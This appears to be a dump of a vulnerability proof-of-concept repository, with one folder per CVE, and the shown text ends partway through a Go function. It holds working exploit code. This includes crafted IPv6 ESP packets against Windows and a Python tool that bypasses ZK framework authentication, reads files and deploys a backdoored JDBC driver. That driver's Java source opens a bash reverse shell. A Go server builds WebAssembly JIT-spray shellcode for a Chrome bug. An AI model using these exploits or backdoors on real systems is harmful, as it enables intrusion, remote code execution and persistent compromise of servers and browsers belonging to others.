├── .DS_Store ├── CVE-2022-34718 └── poc.cpp ├── CVE-2022-36537 ├── Driver.java ├── chromedriver ├── cve-2022-36537.py ├── mysql-connector-java-5.1.48.jar └── requirements.txt ├── CVE-2022-3723 ├── 01.html ├── Readme.md ├── arr.html ├── exp.html ├── go.mod ├── go.sum └── mainHttps.go ├── CVE-2023-23410 └── CVE-2023-23410_poc.c ├── CVE-2023-28231 └── CVE-2023-28231-DHCP-VUL-PoC.cpp ├── CVE-2023-29336 └── poc.cpp ├── CVE-2023-41047 └── CVE-2023-41047.go ├── CVE-2024-24919 └── exp.py └── README.md /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/numencyber/Vulnerability_PoC/c2de4c67548bbd9eefd26b4a4ac9e04799b3fb0b/.DS_Store -------------------------------------------------------------------------------- /CVE-2022-34718/poc.cpp: -------------------------------------------------------------------------------- 1 | //////////////////////////////////////////////// 2 | // ScannerDemo.cpp文件 3 | 4 | #include "../common/initsock.h" 5 | 6 | #include 7 | #include 8 | 9 | #include "ntddndis.h" 10 | 11 | #include "protoutils.h" 12 | #include "ProtoPacket.h" 13 | #include 14 | #include "Iphlpapi.h" 15 | #pragma comment(lib, "Iphlpapi.lib") 16 | #pragma comment(lib, "Bcrypt.lib") 17 | 18 | #include "../common/comm.h" 19 | 20 | 21 | DWORD WINAPI SendThread(LPVOID lpParam); 22 | BOOL GetGlobalData(); 23 | 24 | u_char g_ucLocalMac[6]; 25 | DWORD g_dwGatewayIP; 26 | DWORD g_dwLocalIP; 27 | DWORD g_dwMask; 28 | 29 | CInitSock theSock; 30 | BCRYPT_ALG_HANDLE m_hAesAlg; 31 | BCRYPT_KEY_HANDLE m_hKey; 32 | PBYTE m_pbKeyObject; 33 | PBYTE m_pbIV; 34 | 35 | //Handle for Hash 36 | BCRYPT_HASH_HANDLE m_hHash; 37 | PBYTE m_pbHashObject; 38 | BCRYPT_ALG_HANDLE m_hHashAlg; 39 | BYTE rgbHash[0x14]; 40 | 41 | UCHAR str_SHA1_key[] = 42 | "\xbc\x3d\x6e\x74\x2d\xd2\x13\xbe\x0b\xa9\x42\xb7\x33\xa4\x7a\xf4\x9b\xa2\xa8\x90"; 43 | UINT32 spi = htonl(0x861b157c); 44 | void SHA1(PUCHAR str_data, DWORD len) 45 | { 46 | 47 | BCRYPT_KEY_HANDLE hKey = NULL; 48 | DWORD cbHashObject, cbResult, temp = 0; 49 | 50 | DWORD cbData = 0; 51 | BCryptOpenAlgorithmProvider(&m_hHashAlg, BCRYPT_SHA1_ALGORITHM, NULL, 8); 52 | // Determine the size of the Hash object 53 | BCryptGetProperty(m_hHashAlg, BCRYPT_OBJECT_LENGTH, (PBYTE)&cbHashObject, sizeof(DWORD), &cbResult, 0); 54 | m_pbHashObject = (PBYTE)malloc(cbHashObject); 55 | // Create the Hash object 56 | BCryptCreateHash(m_hHashAlg, &m_hHash, m_pbHashObject, cbHashObject, str_SHA1_key, 0x14, 0); 57 | // Hash the data 58 | BCryptHashData(m_hHash, (PBYTE)str_data, len, 0); 59 | // Finish the hash 60 | BCryptFinishHash(m_hHash, rgbHash, 0x14, 0); 61 | return ; 62 | 63 | } 64 | BOOL GetGlobalData() 65 | { 66 | PIP_ADAPTER_INFO pAdapterInfo = NULL; 67 | ULONG ulLen = 0; 68 | 69 | ::GetAdaptersInfo(pAdapterInfo, &ulLen); 70 | pAdapterInfo = (PIP_ADAPTER_INFO)::GlobalAlloc(GPTR, ulLen); 71 | 72 | if (::GetAdaptersInfo(pAdapterInfo, &ulLen) == ERROR_SUCCESS) 73 | { 74 | if (pAdapterInfo != NULL) 75 | { 76 | memcpy(g_ucLocalMac, pAdapterInfo->Address, 6); 77 | g_dwGatewayIP = ::inet_addr(pAdapterInfo->GatewayList.IpAddress.String); 78 | g_dwLocalIP = ::inet_addr(pAdapterInfo->IpAddressList.IpAddress.String); 79 | g_dwMask = ::inet_addr(pAdapterInfo->IpAddressList.IpMask.String); 80 | } 81 | } 82 | ::GlobalFree(pAdapterInfo); 83 | return TRUE; 84 | } 85 | int main() 86 | { 87 | GetGlobalData(); 88 | if (!ProtoStartService()) 89 | { 90 | printf(" ProtoStartService() failed %d \n", ::GetLastError()); 91 | return -1; 92 | } 93 | HANDLE hControlDevice = ProtoOpenControlDevice(); 94 | if (hControlDevice == INVALID_HANDLE_VALUE) 95 | { 96 | printf(" ProtoOpenControlDevice() failed() %d \n", ::GetLastError()); 97 | ProtoStopService(); 98 | return -1; 99 | } 100 | CPROTOAdapters adapters; 101 | if (!adapters.EnumAdapters(hControlDevice)) 102 | { 103 | printf(" Enume adapter failed \n"); 104 | ProtoStopService(); 105 | return -1; 106 | } 107 | 108 | CAdapter adapter; 109 | if (!adapter.OpenAdapter(adapters.m_pwszSymbolicLink[0], FALSE)) 110 | { 111 | printf(" OpenAdapter failed \n"); 112 | ProtoStopService(); 113 | return -1; 114 | } 115 | 116 | adapter.SetFilter( // NDIS_PACKET_TYPE_PROMISCUOUS| 117 | NDIS_PACKET_TYPE_DIRECTED | 118 | NDIS_PACKET_TYPE_MULTICAST | NDIS_PACKET_TYPE_BROADCAST); 119 | 120 | 121 | UCHAR ipv6_ESP_Fragment_1[] = 122 | "\x00\x0c\x29\x1c\x11\x93\x00\x0c\x29\x5c\x9a\x88\x86\xdd\x60\x00" 123 | "\x00\x00\x00\x38\x32\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x81\x85" 124 | "\xb1\x51\x19\x43\x54\x19\xfe\x80\x00\x00\x00\x00\x00\x00\xf8\xe5" 125 | "\x70\x83\x16\x6f\xef\x6b" 126 | 127 | "\x41\x41\x41\x41\x00\x00\x00\x21"//SPI+Seq 128 | "\x2c\x00\x00\x01\x52\x52\x52\x52\x32\x00\x00\x01\x96\x74\xd9\x9d" 129 | "\x2b\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00" 130 | "\x01\x02\x02\x2c"//ESP tail 131 | "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";//HMAC; 132 | UCHAR ipv6_ESP_Fragment_2[] = 133 | "\x00\x0c\x29\x1c\x11\x93\x00\x0c\x29\x5c\x9a\x88\x86\xdd\x60\x00" 134 | "\x00\x00\x00\x38\x32\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x81\x85" 135 | "\xb1\x51\x19\x43\x54\x19\xfe\x80\x00\x00\x00\x00\x00\x00\xf8\xe5" 136 | "\x70\x83\x16\x6f\xef\x6b" 137 | 138 | "\x41\x41\x41\x41\x00\x00\x00\x22"//SPI+Seq 139 | "\x2c\x00\x00\x18\x52\x52\x52\x52\x32\x00\x00\x00\x96\x74\xd9\x9d" 140 | "\x2b\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00" 141 | "\x01\x02\x02\x2c"//ESP tail 142 | "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";//HMAC; 143 | 144 | 145 | memcpy(ipv6_ESP_Fragment_1 + 0x36, &spi, 4); 146 | SHA1(&ipv6_ESP_Fragment_1[0x36], 0x2c); 147 | memcpy(ipv6_ESP_Fragment_1 + 0x62, rgbHash, 0x0c); 148 | 149 | memcpy(ipv6_ESP_Fragment_2 + 0x36, &spi, 4); 150 | SHA1(&ipv6_ESP_Fragment_2[0x36], 0x2c); 151 | memcpy(ipv6_ESP_Fragment_2 + 0x62, rgbHash, 0x0c); 152 | 153 | adapter.SendData(ipv6_ESP_Fragment_1, sizeof(ipv6_ESP_Fragment_1)-1); 154 | 155 | adapter.SendData(ipv6_ESP_Fragment_2, sizeof(ipv6_ESP_Fragment_2)-1); 156 | 157 | ProtoStopService(); 158 | 159 | return 0; 160 | } 161 | 162 | 163 | 164 | 165 | 166 | -------------------------------------------------------------------------------- /CVE-2022-36537/Driver.java: -------------------------------------------------------------------------------- 1 | package com.mysql.jdbc; 2 | 3 | import java.sql.*; 4 | import java.util.*; 5 | import java.util.logging.Logger; 6 | 7 | /* 8 | author: Bearcat of www.numencyber.com 9 | desc : Mysql jdbc backdoor driver 10 | */ 11 | public class Driver implements java.sql.Driver { 12 | static { 13 | String winCmd = "calc"; 14 | String linuxCmd = "bash -i >& /dev/tcp/192.168.1.3/2022 0>&1"; 15 | 16 | String[] cmds = null; 17 | 18 | if (System.getProperty("os.name").toLowerCase().contains("win")) { 19 | cmds = new String[]{"cmd.exe", "/c", winCmd}; 20 | } else { 21 | cmds = new String[]{"/bin/bash", "-c", linuxCmd}; 22 | } 23 | 24 | try { 25 | Runtime.getRuntime().exec(cmds); 26 | } catch (Exception ignored) { 27 | // do nothing... 28 | } 29 | } 30 | 31 | @Override 32 | public Connection connect(String url, Properties info) throws SQLException { 33 | return null; 34 | } 35 | 36 | @Override 37 | public boolean acceptsURL(String url) throws SQLException { 38 | return false; 39 | } 40 | 41 | @Override 42 | public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException { 43 | return new DriverPropertyInfo[0]; 44 | } 45 | 46 | @Override 47 | public int getMajorVersion() { 48 | return 0; 49 | } 50 | 51 | @Override 52 | public int getMinorVersion() { 53 | return 0; 54 | } 55 | 56 | @Override 57 | public boolean jdbcCompliant() { 58 | return false; 59 | } 60 | 61 | @Override 62 | public Logger getParentLogger() throws SQLFeatureNotSupportedException { 63 | return null; 64 | } 65 | } -------------------------------------------------------------------------------- /CVE-2022-36537/chromedriver: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/numencyber/Vulnerability_PoC/c2de4c67548bbd9eefd26b4a4ac9e04799b3fb0b/CVE-2022-36537/chromedriver -------------------------------------------------------------------------------- /CVE-2022-36537/cve-2022-36537.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # coding: utf-8 3 | """ 4 | @File : cve-2022-36537.py 5 | @Time : 2022/11/11 23:34 6 | @Author : Bearcat of www.numencyber.com 7 | @Version : 1.0 8 | @Desc : ZK framework authentication bypass & connectWise r1Soft server backup manager remote code execution. 9 | """ 10 | 11 | import sys 12 | import subprocess 13 | import os 14 | import warnings 15 | import re 16 | 17 | import zipfile 18 | import shutil 19 | 20 | import requests 21 | from requests_toolbelt import MultipartEncoder 22 | import urllib3 23 | 24 | from selenium import webdriver 25 | from rich import print as rprint 26 | 27 | import argparse 28 | 29 | urllib3.disable_warnings() 30 | 31 | # proxy = { 32 | # "http": "http://127.0.0.1:8080" 33 | # } 34 | 35 | proxy = {} 36 | 37 | 38 | # https://chromedriver.storage.googleapis.com/index.html?path=107.0.5304.62/ 39 | def bypass_auth1(target): 40 | warnings.warn("Discard. The bypass auch2 function is simpler to obtain dtid and cookies.", DeprecationWarning) 41 | rprint("[italic green][*] Bypass authentication.") 42 | try: 43 | opt = webdriver.ChromeOptions() 44 | opt.add_argument('--headless') 45 | opt.add_argument('--ignore-certificate-errors') 46 | driver = webdriver.Chrome(executable_path='./chromedriver', options=opt) 47 | driver.get(target) 48 | cookie_str = "JSESSIONID=" + driver.get_cookie("JSESSIONID")['value'] 49 | dtid = driver.execute_script(""" 50 | for (var dtid in zk.Desktop.all) 51 | return dtid 52 | """) 53 | return dtid, cookie_str 54 | except Exception as e: 55 | rprint("[italic red][-] Bypass authentication failed. {0}".format(e)) 56 | exit() 57 | 58 | 59 | def bypass_auth2(target): 60 | rprint("[italic green][*] Bypass authentication.") 61 | uri = "{0}/login.zul".format(target) 62 | try: 63 | result = requests.get(url=uri, timeout=3, verify=False, proxies=proxy) 64 | cookie_str = result.headers['Set-Cookie'].split(";")[0] 65 | r = u"dt:'(.*?)',cu:" 66 | regex = re.compile(r) 67 | dtid = regex.findall(result.text)[0] 68 | return dtid, cookie_str 69 | except Exception as e: 70 | rprint("[italic red][-] Bypass authentication failed. {0}".format(e)) 71 | exit() 72 | 73 | 74 | def forward_request(target, next_uri, cookie_str, uuid, dtid): 75 | uri = "{0}/zkau/upload?uuid={1}&dtid={2}&sid=0&maxsize=-1".format(target, uuid, dtid) 76 | param = {"nextURI": (None, next_uri)} 77 | headers = {"Cookie": cookie_str} 78 | data = MultipartEncoder(param, boundary="----WebKitFormBoundaryCs6yB0zvpfSBbYEp") 79 | headers["Content-Type"] = data.content_type 80 | try: 81 | result = requests.post(url=uri, headers=headers, data=data.to_string(), timeout=3, verify=False, proxies=proxy) 82 | return result 83 | except Exception as e: 84 | rprint("[italic red][-] Forward request failed. {0}".format(e)) 85 | exit() 86 | 87 | 88 | def read_file(target, filename): 89 | # get login_dtid 90 | login_dtid, cookie_str = bypass_auth2(target) 91 | rprint("[italic green][*] Start reading the file:") 92 | result = forward_request(target, filename, cookie_str, "101010", login_dtid) 93 | return "-----file start-----\n{0}\n-----file end-----".format(result.text) 94 | 95 | 96 | def deploy_jdbc_backdoor(target): 97 | rprint( 98 | "[italic red][!] The jdbc backdoor can only be deployed once, please make it persistent, such as rebounding the shell.") 99 | play_again = input("Whether to continue? (y/n):").lower() 100 | if play_again[0] != "y": 101 | exit() 102 | # get login_dtid 103 | login_dtid, cookie_str = bypass_auth2(target) 104 | rprint("[italic green][*] Start deploying the jdbc backdoor.") 105 | build_jdbc_backdoor() 106 | # database_dtid and mysql_driver_upload_button_id 107 | uri = "/Configuration/database-drivers.zul" 108 | result = forward_request(target, uri, cookie_str, "101010", login_dtid) 109 | r1 = u"{dt:'(.*?)',cu:" 110 | regex = re.compile(r1) 111 | database_dtid = regex.findall(result.text)[0] 112 | r1 = u"'zul.wgt.Button','(.*?)'," 113 | regex = re.compile(r1) 114 | mysql_driver_upload_button_id = regex.findall(result.text)[0] 115 | 116 | uri = "/zkau?dtid={0}&cmd_0=onClick&uuid_0={1}&data_0=%7B%22pageX%22%3A315%2C%22pageY%22%3A120%2C%22which%22%3A1%2C%22x%22%3A39%2C%22y%22%3A23%7D".format( 117 | database_dtid, mysql_driver_upload_button_id) 118 | result = forward_request(target, uri, cookie_str, "101010", login_dtid) 119 | 120 | # file_upload_dlg_id and file_upload_id 121 | r1 = u"zul.fud.FileuploadDlg','(.*?)'," 122 | regex = re.compile(r1) 123 | file_upload_dlg_id = regex.findall(result.text)[0] 124 | 125 | r1 = u"zul.wgt.Fileupload','(.*?)'," 126 | regex = re.compile(r1) 127 | file_upload_id = regex.findall(result.text)[0] 128 | 129 | uri = "{0}/zkau/upload?uuid={1}&dtid={2}&sid=0&maxsize=-1".format(target, file_upload_id, database_dtid) 130 | upload_jdbc_backdoor(uri, cookie_str) 131 | 132 | uri = "/zkau?dtid={0}&cmd_0=onMove&opt_0=i&uuid_0={1}&data_0=%7B%22left%22%3A%22716px%22%2C%22top%22%3A%22100px%22%7D&cmd_1=onZIndex&opt_1=i&uuid_1={2}&data_1=%7B%22%22%3A1800%7D&cmd_2=updateResult&data_2=%7B%22contentId%22%3A%22z__ul_0%22%2C%22wid%22%3A%22{3}%22%2C%22sid%22%3A%220%22%7D".format( 133 | database_dtid, file_upload_dlg_id, file_upload_dlg_id, file_upload_id) 134 | forward_request(target, uri, cookie_str, "101010", login_dtid) 135 | 136 | uri = "/zkau?dtid={0}&cmd_0=onClose&uuid_0={1}&data_0=%7B%22%22%3Atrue%7D".format(database_dtid, 137 | file_upload_dlg_id) 138 | forward_request(target, uri, cookie_str, "101010", login_dtid) 139 | 140 | 141 | def upload_jdbc_backdoor(uri, cookie_str): 142 | rprint("[italic green][*] Upload the database driver.") 143 | headers = {"Cookie": cookie_str} 144 | files = {'file': ('b.jar', open('jdbc_backdoor.jar', 'rb'), 'application/java-archive')} 145 | try: 146 | requests.post(uri, files=files, headers=headers, timeout=6, verify=False, proxies=proxy) 147 | except Exception as e: 148 | rprint("[italic red][-] Upload the database driver failed. {0}".format(e)) 149 | exit() 150 | 151 | 152 | def build_jdbc_backdoor(): 153 | rprint("[italic green][*] Compile java code.") 154 | java_cmd = 'javac -source 1.5 -target 1.5 Driver.java' 155 | popen = subprocess.Popen(java_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 156 | popen.stdout.read() 157 | 158 | tmp_path = 'jdbc_jar' 159 | os.mkdir(tmp_path) 160 | with zipfile.ZipFile('mysql-connector-java-5.1.48.jar', 'r', zipfile.ZIP_DEFLATED) as unzf: 161 | unzf.extractall("jdbc_jar") 162 | unzf.close() 163 | os.remove('jdbc_jar/com/mysql/jdbc/Driver.class') 164 | shutil.copy('Driver.class', 'jdbc_jar/com/mysql/jdbc/') 165 | 166 | with zipfile.ZipFile('jdbc_backdoor.jar', 'w', zipfile.ZIP_DEFLATED) as zf: 167 | for root, dirs, files in os.walk(tmp_path): 168 | relative_root = '' if root == tmp_path else root.replace(tmp_path, '') + os.sep 169 | for filename in files: 170 | zf.write(os.path.join(root, filename), relative_root + filename) 171 | zf.close() 172 | shutil.rmtree(tmp_path) 173 | 174 | rprint("[italic green][*] Build jdbc backdoor success.") 175 | 176 | 177 | def banner(): 178 | rprint("[italic white]CVE-2022-36537:\n\tZK framework authentication bypass") 179 | rprint("[italic white]\tConnectWise r1Soft server backup manager remote code execution") 180 | 181 | 182 | def parse_args(): 183 | parser = argparse.ArgumentParser(prog='cve-2022-36537', 184 | formatter_class=argparse.RawTextHelpFormatter, 185 | description='author: Bearcat of www.numencyber.com', 186 | usage='cve-2022-36537.py [options]') 187 | parser.add_argument('-u', '--url', type=str, default='', help='target url') 188 | parser.add_argument('-r', '--read', type=str, default='', help='reading the file') 189 | parser.add_argument('-b', '--build', action="store_true", help='build jdbc backdoor') 190 | parser.add_argument('-d', '--deploy', action="store_true", help='deploying the jdbc backdoor') 191 | 192 | if len(sys.argv) == 1: 193 | sys.argv.append('-h') 194 | 195 | args = parser.parse_args() 196 | return args 197 | 198 | 199 | if __name__ == '__main__': 200 | banner() 201 | args = parse_args() 202 | if args.url and args.read: 203 | print(read_file(args.url, args.read)) 204 | exit() 205 | if args.build: 206 | build_jdbc_backdoor() 207 | exit() 208 | if args.url and args.deploy: 209 | deploy_jdbc_backdoor(args.url) 210 | exit() 211 | -------------------------------------------------------------------------------- /CVE-2022-36537/mysql-connector-java-5.1.48.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/numencyber/Vulnerability_PoC/c2de4c67548bbd9eefd26b4a4ac9e04799b3fb0b/CVE-2022-36537/mysql-connector-java-5.1.48.jar -------------------------------------------------------------------------------- /CVE-2022-36537/requirements.txt: -------------------------------------------------------------------------------- 1 | requests==2.28.1 2 | requests_toolbelt==0.10.1 3 | rich==12.6.0 4 | selenium==4.7.2 5 | urllib3==1.25.3 6 | -------------------------------------------------------------------------------- /CVE-2022-3723/01.html: -------------------------------------------------------------------------------- 1 | 2 |
3 | 4 | -------------------------------------------------------------------------------- /CVE-2022-3723/Readme.md: -------------------------------------------------------------------------------- 1 | exploit of CVE-2022-3723 2 | 3 | based on google's public poc -------------------------------------------------------------------------------- /CVE-2022-3723/arr.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CVE-2022-3723/exp.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CVE-2022-3723/go.mod: -------------------------------------------------------------------------------- 1 | module httpsServer 2 | 3 | go 1.20 4 | 5 | require github.com/bytecodealliance/wasmtime-go/v8 v8.0.0 6 | -------------------------------------------------------------------------------- /CVE-2022-3723/go.sum: -------------------------------------------------------------------------------- 1 | github.com/bytecodealliance/wasmtime-go/v8 v8.0.0 h1:jP4sqm2PHgm3+eQ50zCoCdIyQFkIL/Rtkw6TT8OYPFI= 2 | github.com/bytecodealliance/wasmtime-go/v8 v8.0.0/go.mod h1:tgazNLU7xSC2gfRAM8L4WyE+dgs5yp9FF5/tGebEQyM= 3 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= 4 | github.com/niemeyer/pretty v0.0.0-20200227124842-a10e7caefd8e h1:fD57ERR4JtEqsWbfPhv4DMiApHyliiK5xCTNVSPiaAs= 5 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= 6 | github.com/stretchr/testify v1.8.0 h1:pSgiaMZlXftHpm5L7V1+rVB+AZJydKsMxsQBIJw4PKk= 7 | gopkg.in/check.v1 v1.0.0-20200902074654-038fdea0a05b h1:QRR6H1YWRnHb4Y/HeNFCTJLFVxaq6wH4YuVdsUOr75U= 8 | gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= 9 | -------------------------------------------------------------------------------- /CVE-2022-3723/mainHttps.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "errors" 5 | "flag" 6 | "fmt" 7 | "github.com/bytecodealliance/wasmtime-go/v8" 8 | "io/ioutil" 9 | "log" 10 | "math" 11 | "net/http" 12 | "os" 13 | "path" 14 | "path/filepath" 15 | "regexp" 16 | "strconv" 17 | "strings" 18 | ) 19 | 20 | var globalFloat float64 = -1 21 | 22 | var wasm_code = ` 23 | (module 24 | (func $f (export "f") (param i64) 25 | (call $f (i64.const 0x12EB9060B0C03148)) ;; 48 31 C0 B0 60 90 EB 12 12EB9060B0C03148 26 | (call $f (i64.const 0x0BEB9090008B4865)) ;; 65 48 8B 00 90 90 EB 0B 0BEB9090008B4865 27 | (call $f (i64.const 0x0BEB909018408B48)) ;; 48 8B 40 18 90 90 EB 0B 0BEB909018408B48 28 | (call $f (i64.const 0x0BEB909030408B48)) ;; 48 8B 40 30 90 90 EB 0B 0BEB909030408B48 29 | (call $f (i64.const 0x0BEBc08b48C08548)) ;; 48 85 C0 48 8b c0 EB 0B 0BEBc08b48C08548 30 | (call $f (i64.const 0x0BEB000002D1840F)) ;; 0F 84 D1 02 00 00 EB 0B 0BEB000002D1840F 31 | (call $f (i64.const 0x0BEB9000320033BA)) ;; BA 33 00 32 00 90 EB 0B 0BEB9000320033BA 32 | (call $f (i64.const 0x0BEB909020E2C148)) ;; 48 C1 E2 20 90 90 EB 0B 0BEB909020E2C148 33 | (call $f (i64.const 0x0BEB90004C0045B9)) ;; B9 45 00 4C 00 90 EB 0B 0BEB90004C0045B9 34 | (call $f (i64.const 0x0BEBdb8b48CA0148)) ;; 48 01 CA 48 8b db EB 0B 0BEBdb8b48CA0148 35 | (call $f (i64.const 0x0BEB004E0052B941)) ;; 41 B9 52 00 4E 00 EB 0B 0BEB004E0052B941 36 | (call $f (i64.const 0x0BEB909020E1C149)) ;; 49 C1 E1 20 90 90 EB 0B 0BEB909020E1C149 37 | (call $f (i64.const 0x0BEB900045004BB9)) ;; B9 4B 00 45 00 90 EB 0B 0BEB900045004BB9 38 | (call $f (i64.const 0x0BEBc98b48C90149)) ;; 49 01 C9 48 8b c9 EB 0B 0BEBc98b48C90149 39 | (call $f (i64.const 0x0BEB004C004CB841)) ;; 41 B8 4C 00 4C 00 EB 0B 0BEB004C004CB841 40 | (call $f (i64.const 0x0BEB909020E0C149)) ;; 49 C1 E0 20 90 90 EB 0B 0BEB909020E0C149 41 | (call $f (i64.const 0x0BEB900044002EB9)) ;; B9 2E 00 44 00 90 EB 0B 0BEB900044002EB9 42 | (call $f (i64.const 0x0BEBf68b48C80149)) ;; 49 01 C8 48 8b f6 EB 0B 0BEBf68b48C80149 43 | (call $f (i64.const 0x0BEB909040488B48)) ;; 48 8B 48 40 90 90 EB 0B 0BEB909040488B48 44 | (call $f (i64.const 0x0BEB904774C98548)) ;; 48 85 C9 74 47 90 EB 0B 0BEB904774C98548 45 | (call $f (i64.const 0x0BEB90347509394C)) ;; 4C 39 09 75 34 90 EB 0B 0BEB90347509394C 46 | (call $f (i64.const 0x0BEB207508513948)) ;; 48 39 51 08 75 20 EB 0B 0BEB207508513948 47 | (call $f (i64.const 0x0BEB22741041394C)) ;; 4C 39 41 10 74 22 EB 0B 0BEB22741041394C 48 | (call $f (i64.const 0x0BEBC08548008B48)) ;; 48 8B 00 48 85 C0 EB 0B 0BEBC08548008B48 49 | (call $f (i64.const 0x0BEB10488B488C75)) ;; 75 8C 48 8B 48 10 EB 0B 0BEB10488B488C75 50 | (call $f (i64.const 0x0BEB90903C416348)) ;; 48 63 41 3C 90 90 EB 0B 0BEB90903C416348 51 | (call $f (i64.const 0x0BEBC80148C98949)) ;; 49 89 C9 48 01 C8 EB 0B 0BEBC80148C98949 52 | (call $f (i64.const 0x0BEB000000880548)) ;; 48 05 88 00 00 00 EB 0B 0BEB000000880548 53 | (call $f (i64.const 0x0BEB9090C031108B)) ;; 8B 10 31 C0 90 90 EB 0B 0BEB9090C031108B 54 | (call $f (i64.const 0x0BEBff8b48CA0148)) ;; 48 01 CA 48 8b ff EB 0B 0BEBff8b48CA0148 55 | (call $f (i64.const 0x0BEB909018528B44)) ;; 44 8B 52 18 90 90 EB 0B 0BEB909018528B44 56 | (call $f (i64.const 0x0BEB909020428B44)) ;; 44 8B 42 20 90 90 EB 0B 0BEB909020428B44 57 | (call $f (i64.const 0x0BEB9090245A8B44)) ;; 44 8B 5A 24 90 90 EB 0B 0BEB9090245A8B44 58 | (call $f (i64.const 0x0BEB1c528bC80149)) ;; 49 01 C8 8b 52 1c EB 0B 0BEB1c528bC80149 59 | (call $f (i64.const 0x0BEBCA0148CB0149)) ;; 49 01 CB 48 01 CA EB 0B 0BEBCA0148CB0149 60 | (call $f (i64.const 0x0BEBc98b4dD28545)) ;; 45 85 D2 4d 8b c9 EB 0B 0BEBc98b4dD28545 61 | (call $f (i64.const 0x0BEB00000092840F)) ;; 0F 84 92 00 00 00 EB 0B 0BEB00000092840F 62 | (call $f (i64.const 0x0BEB90506C6175BB)) ;; BB 75 61 6C 50 90 EB 0B 0BEB90506C6175BB 63 | (call $f (i64.const 0x0BEB909020E3C148)) ;; 48 C1 E3 20 90 90 EB 0B 0BEB909020E3C148 64 | (call $f (i64.const 0x0BEB9074726956BE)) ;; BE 56 69 72 74 90 EB 0B 0BEB9074726956BE 65 | (call $f (i64.const 0x0BEB088B41F30148)) ;; 48 01 F3 41 8B 08 EB 0B 0BEB088B41F30148 66 | (call $f (i64.const 0x0BEB4674091C394A)) ;; 4A 39 1C 09 74 46 EB 0B 0BEB4674091C394A 67 | (call $f (i64.const 0x0BEB04C08349C0FF)) ;; FF C0 49 83 C0 04 EB 0B 0BEB04C08349C0FF 68 | (call $f (i64.const 0x0BEB90C572D03944)) ;; 44 39 D0 72 C5 90 EB 0B 0BEB90C572D03944 69 | (call $f (i64.const 0x0BEBd28b4dC3C031)) ;; 31 C0 C3 4d 8b d2 EB 0B 0BEBd28b4dC3C031 70 | (call $f (i64.const 0x0BEB904304B70F41)) ;; 41 0F B7 04 43 90 EB 0B 0BEB904304B70F41 71 | (call $f (i64.const 0x0BEB9008245C8B48)) ;; 48 8B 5C 24 08 90 EB 0B 0BEB9008245C8B48 72 | (call $f (i64.const 0x0BEBC8014C82048B)) ;; 8B 04 82 4C 01 C8 EB 0B 0BEBC8014C82048B 73 | 74 | (call $f (i64.const 0x0BEB909090C68948)) ;; 48 89 C6 90 90 90 EB 0B 0BEB909090C68948 75 | (call $f (i64.const 0x0BEB9000002000BA)) ;; BA 00 20 00 00 90 EB 0B 0BEB9000002000BA 76 | (call $f (i64.const 0x0BEB00000040B841)) ;; 41 B8 40 00 00 00 EB 0B 0BEB00000040B841 77 | (call $f (i64.const 0x0BEB90AABBCCDDB8)) ;; B8 DD CC BB AA 90 EB 0B 0BEB90AABBCCDDB8 78 | (call $f (i64.const 0x0BEB909050F0014C)) ;; 4C 01 F0 50 50 90 EB 0B 0BEB909050F0014C 79 | (call $f (i64.const 0x0BEB909090C18948)) ;; 48 89 C1 90 90 90 EB 0B 0BEB909090C18948 80 | (call $f (i64.const 0x0BEB000019000548)) ;; 48 05 00 19 00 00 EB 0B 0BEB000019000548 81 | (call $f (i64.const 0x0BEB90E6FFC18949)) ;; 49 89 C1 FF E6 90 EB 0B 0BEB90E6FFC18949 82 | )) 83 | ` 84 | 85 | func faviconHandler(w http.ResponseWriter, r *http.Request) { 86 | http.ServeFile(w, r, "favicon.ico") 87 | } 88 | 89 | func check(e error) { 90 | if e != nil { 91 | panic(e) 92 | } 93 | } 94 | func isValidAddress(str string) bool { 95 | match, _ := regexp.MatchString("^[0-9a-fA-F]{1,8}$", str) 96 | return match 97 | } 98 | 99 | func processShellcodeAddr(str string, code string) (string, error) { 100 | if !isValidAddress(str) { 101 | fmt.Println("ShellcodeAddr地址无效") 102 | return "", errors.New("ShellcodeAddr地址无效") 103 | } 104 | code = strings.Replace(code, "0x0BEB90AABBCCDDB8", "0x0BEB90"+str+"B8", 1) 105 | return code, nil 106 | } 107 | func fileServerHandler(w http.ResponseWriter, r *http.Request) { 108 | fmt.Println(r.URL.Path) 109 | p := "." + r.URL.Path 110 | extName := path.Ext(r.URL.Path) 111 | // 获取路径的最后一部分 112 | base := path.Base(r.URL.Path) 113 | // 检查它是否全部由0-9或a-f组成 114 | match, _ := regexp.MatchString("^[0-9a-f]+$", base) 115 | if match { 116 | fmt.Println("Matched string:", base) 117 | // 解析十六进制字符串为整数 118 | i, err := strconv.ParseInt(base, 16, 64) 119 | if err != nil { 120 | log.Println("Error parsing hex string:", err) 121 | http.ServeFile(w, r, p) 122 | return 123 | } 124 | // 获得i的高4个字节并减去0x10 125 | high4Bytes := int64(uint64(i)>>32) - 0x10 126 | 127 | // 确保减法操作不会使值变为负数 128 | if high4Bytes < 0 { 129 | high4Bytes = 0 130 | } 131 | 132 | // 用新值替换i的高4个字节 133 | i = (high4Bytes << 32) | (i & 0xFFFFFFFF) 134 | // 解析整数为浮点数 135 | globalFloat = math.Float64frombits(uint64(i)) 136 | // 打印浮点数 137 | fmt.Println("Float: ", globalFloat) 138 | // Send an empty response 139 | 